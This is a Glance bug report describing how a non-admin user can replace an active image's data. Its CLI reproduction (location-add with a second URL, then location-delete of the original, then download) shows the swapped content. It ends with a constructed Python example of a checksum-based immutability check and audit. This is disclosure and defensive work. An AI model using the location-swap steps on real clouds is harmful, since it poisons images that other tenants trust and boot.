Comment 0 for bug 1549483

Mike Fedosin (mfedosin) wrote :

Some time ago there was a security bug https://bugs.launchpad.net/glance/+bug/1525915 and a patch was proposed and merged in the Glance repo. Unfortunately it only partially fixed the problem, and the issue with immutability still exists.

Bug description:
A user (non-admin) can change image data by updating the location for an image when the "show_multiple_locations" config parameter has been set to true. This breaks the immutability of images in Glance and allows a malicious user to replace data after image activation.

mfedosin@wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-11-10T18:41:53Z |
| virtual_size | None |
| visibility | public |
+------------------+--------------------------------------+
mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| file | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": |
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-10T18:42:21Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin@wdev:~$ cat ooo
I'm really good image.
mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/bad.txt'
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| file | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": |
| | {}}, {"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt", "metadata": |
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-10T18:42:29Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
mfedosin@wdev:~$ glance location-delete 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin@wdev:~$ cat ooo
All your base are belong to us! Muahahaha!
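The invariant the report describes, modelled as an added example that is not Glance's code: once an image is active its bytes are fixed, so a location may only be added if its content hashes to the recorded checksum, locations are never removed, and an active image that has locations but no checksum (the state visible in the output above) is flagged by an audit. The URLs, image records and bytes below are constructed; `fetch` is a hypothetical stand-in for reading a location's content.

```python
import hashlib

# Constructed sample data standing in for the two files in the report.
GOOD_BYTES = b"I'm really good image.\n"
BAD_BYTES = b"All your base are belong to us! Muahahaha!\n"
STORE = {  # hypothetical store: location URL -> bytes served there
    "https://example.invalid/good.txt": GOOD_BYTES,
    "https://example.invalid/mirror.txt": GOOD_BYTES,  # same data, other URL
    "https://example.invalid/bad.txt": BAD_BYTES,
}

class ImmutabilityViolation(Exception):
    """Raised when a location change could alter what an active image serves."""

def md5_hex(data: bytes) -> str:
    # Glance records image checksums as MD5 hex digests.
    return hashlib.md5(data).hexdigest()

def add_location(image: dict, url: str, fetch=STORE.__getitem__) -> dict:
    """Return a copy of `image` with `url` added, or raise (hypothetical policy)."""
    new_loc = {"url": url, "metadata": {}}
    if image["status"] != "active":
        # First location fixes the data: record checksum and size, then activate.
        data = fetch(url)
        return {**image, "status": "active", "checksum": md5_hex(data),
                "size": len(data), "locations": image["locations"] + [new_loc]}
    if image["checksum"] is None:
        # Nothing to verify against, so the new data cannot be trusted.
        raise ImmutabilityViolation("active image has no checksum; refusing add")
    if md5_hex(fetch(url)) != image["checksum"]:
        raise ImmutabilityViolation("location data does not match image checksum")
    return {**image, "locations": image["locations"] + [new_loc]}

def delete_location(image: dict, url: str) -> dict:
    """Hypothetical policy: removing a location from an active image is refused,
    because dropping the original while keeping a new one swaps the served data."""
    if image["status"] == "active":
        raise ImmutabilityViolation("locations of an active image are immutable")
    return {**image, "locations": [l for l in image["locations"] if l["url"] != url]}

def audit(images) -> list:
    """Ids of active images that have locations but no checksum: the tell-tale
    state of data published via location-add without Glance hashing it."""
    return [i["id"] for i in images
            if i["status"] == "active" and i["locations"] and i["checksum"] is None]
```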